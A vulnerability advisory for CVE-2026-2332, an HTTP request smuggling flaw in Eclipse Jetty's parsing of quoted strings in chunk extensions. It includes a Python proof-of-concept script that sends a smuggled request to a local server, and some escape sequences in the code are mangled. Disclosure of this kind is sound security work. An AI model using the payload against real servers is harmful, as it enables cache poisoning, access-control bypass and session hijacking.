PT-2026-32618 · Eclipse Foundation+1 · Eclipse Jetty+1
Xclow3N
·
Published
2026-04-14
·
Updated
2026-04-14
·
CVE-2026-2332
CVSS v3.1
7.4
High
| AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N |
Description (as reported)
Jetty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.
Background
This vulnerability is a new variant discovered while researching the "Funky Chunks" HTTP request smuggling techniques:
The original research tested various chunk extension parsing differentials but did not test quoted-string handling within extension values.
Technical Details
RFC 9112 Section 7.1.1 defines chunked transfer encoding:
chunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF
chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] )
chunk-ext-val = token / quoted-stringRFC 9110 Section 5.6.4 defines quoted-string:
quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTEA quoted-string continues until the closing DQUOTE, and
r sequences are not permitted within the quotes.Vulnerability
Jetty terminates chunk header parsing at
r inside quoted strings instead of treating this as an error.Expected (RFC compliant):
Chunk: 1;a="valuer
here"r
^^^^^^^^^^^^^^^^^^ extension value
Body: [1 byte after the real r
]Actual (jetty):
Chunk: 1;a="value
^^^^^ terminates here (WRONG)
Body: here"... treated as body/next requestProof of Concept
#!/usr/bin/env python3
import socket
payload = (
b"POST / HTTP/1.1r
"
b"Host: localhostr
"
b"Transfer-Encoding: chunkedr
"
b"r
"
b'1;a="r
'
b"Xr
"
b"0r
"
b"r
"
b"GET /smuggled HTTP/1.1r
"
b"Host: localhostr
"
b"Content-Length: 11r
"
b"r
"
b'"r
'
b"Yr
"
b"0r
"
b"r
"
)
sock = socket.socket(socket.AF INET, socket.SOCK STREAM)
sock.settimeout(3)
sock.connect(("127.0.0.1", 8080))
sock.sendall(payload)
response = b""
while True:
try:
chunk = sock.recv(4096)
if not chunk:
break
response += chunk
except socket.timeout:
break
sock.close()
print(f"Responses: {response.count(b'HTTP/')}")
print(response.decode(errors="replace"))Result: Server returns 2 HTTP responses from a single TCP connection.
Parsing Breakdown
| Parser | Request 1 | Request 2 |
|---|---|---|
| jetty (vulnerable) | POST / body="X" | GET /smuggled (SMUGGLED!) |
| RFC compliant | POST / body="Y" | (none - smuggled request hidden in extension) |
Impact
- Request Smuggling: Attacker injects arbitrary HTTP requests
- Cache Poisoning: Smuggled responses poison shared caches
- Access Control Bypass: Smuggled requests bypass frontend security
- Session Hijacking: Smuggled requests can steal other users' responses
Reproduction
- Start the minimal POC with docker
- Run the poc script provided in same zip
Suggested Fix
Ensure the chunk framing and extensions are parsed exactly as specified in RFC9112.
A CRLF inside a quoted-string should be considered a parsing error and not a line terminator.
Patches
No patches yet.
Workarounds
No workarounds yet.
Fix
HTTP Request/Response Smuggling
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Eclipse Jetty
Org.Eclipse.Jetty:Jetty-Http